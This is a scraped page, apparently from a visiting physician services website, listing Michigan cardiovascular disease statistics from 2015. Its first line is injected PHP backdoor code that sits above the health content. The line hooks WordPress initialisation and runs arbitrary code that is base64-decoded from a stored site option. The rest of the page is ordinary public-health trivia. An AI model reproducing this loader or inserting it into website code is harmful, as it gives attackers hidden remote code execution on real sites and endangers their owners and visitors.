add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) );
Visiting Physician Services | Education
Did You Know?
Cardiovascular Disease in Michigan
February 2015 Update
- 1More than 25% of deaths in Michigan in 2013 were due to cardiovascular disease and stroke.
- 2Heart Disease was the leading cause of death in men (n-12,001) and women (n=11,501) in 2012
- 3In 2013, 34.6% of Michigan adults reported ever being told they have high blood pressure.
- 4By 2030, heart disease cases in Michigan are projected to rise from 600,000 to 2.9 million.
- 5In the past five years in Michigan 58,298 women have died of heart disease. This number of women could easily fill Comerica Park for a Detroit Tigers baseball game.
*Prepared by the Michigan Department of Community Health, Cardiovascular Health, Nutrition and Physical Section